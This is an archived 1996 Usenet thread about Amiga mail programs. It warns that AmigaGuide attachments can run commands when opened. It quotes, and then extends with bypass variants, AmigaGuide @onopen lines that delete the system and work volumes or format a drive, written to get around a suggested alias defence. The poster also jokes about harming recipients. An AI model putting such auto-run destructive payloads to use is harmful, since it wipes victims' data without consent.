home *** CD-ROM | disk | FTP | other *** search
/ NetNews Offline 2 / NetNews Offline Volume 2.iso / news / comp / sys / amiga / programmer / 1088 < prev    next >
Encoding:
Internet Message Format  |  1996-08-05  |  2.4 KB

  1. Path: lightning.mgl.ca!snapper
  2. From: snapper@mgl.ca (Allan Purtle)
  3. Newsgroups: comp.sys.amiga.programmer,comp.sys.amiga.networking
  4. Subject: Re: Best Mail Program for use with SLIP, SMTP, POP, AmiTCP?
  5. Followup-To: comp.sys.amiga.programmer,comp.sys.amiga.networking
  6. Date: 14 Jan 1996 21:45:48 GMT
  7. Organization: MGL Systems Internet
  8. Message-ID: <4dbtic$c4g@thunder.mgl.ca>
  9. References: <jdjiviqtgtf.fsf@neppari.cs.hut.fi> <1264.6579T945T2649@ipacific.net.au> <4crjnb$gr8@redstone.interpath.net> <54422@babylon.pfm-mainz.de> <4dac6m$8m6@news2.delphi.com>
  10. NNTP-Posting-Host: lightning.mgl.ca
  11. X-Newsreader: TIN [version 1.2 PL2]
  12.  
  13. Joanne Dow (jdow@BIX.com) wrote:
  14. : In article <54422@babylon.pfm-mainz.de>,
  15. :    rbabel@babylon.pfm-mainz.de (Ralph Babel) wrote:
  16. : >Jim Cooper wrote:
  17. : >
  18. : >> Datatypes.
  19. : >>
  20. : >> If you send an AmigaGuide file as an EMail attachment, it
  21. : >> will show up in the Voodoo window *as* AmigaGuide - with
  22. : >> clickable buttons, etc!
  23. : >
  24. : >Good grief!
  25. : >
  26. : >What if someone received the following AmigaGuide attachment?
  27. : >
  28. : >  @database
  29. : >  @onopen "'address command ''delete sys:#? work:#? all quiet force'''"
  30. : >  @node main
  31. : >  @endnode
  32. : >
  33.  
  34. : May I humbly suggest:
  35.  
  36. : alias delete literal echo "You cannot do that!"
  37.  
  38. : (Of course when you go offline you unalias it.)
  39.  
  40. : THat IS a nasty prospect and one that people are starting to face with the
  41. : fancier browsers like Netscape. Netscape is a PRIME method for transporting
  42. : viruses that way.
  43.  
  44. : {^_^}     Joanne Dow, Amiga Exchange Editor on BIX, aka The Wizardess
  45. :           jdow@bix.com, jdow@delphi.com, jdow@mci.newscorp.com
  46.  
  47.   @onopen "'address command ''SYS:C/delete sys:#? work:#? all quiet force'''"
  48.  
  49.   @onopen "'address command ''{which delete} sys:#? work:#? all quiet force'''" 
  50.  
  51.   @onopen "'address command ''SYS:System/format >NIL: <NIL: wb_2.x: quick ofs'''" --
  52.  
  53. Personally, I would just do a mount on unit zero and let you screw yourself over 
  54. the course of the following "where did that come from" reactions.
  55.  
  56. If you give the opportunity to execute on your machine, you deserve what you get.
  57. Generally speaking, single user operating systems are not condusive to secure 
  58. connection to outside sources.
  59.  
  60. Wait till you get a Java on your Amiga.... then I can run my own code on your 
  61. machine easily, as opposed to having to do a bunch of work to do it via rexx. When 
  62. you tell me my Java applet zapped your drive, I'll just say "oh, a bug, I'll have 
  63. to fix that some day..."
  64.  
  65.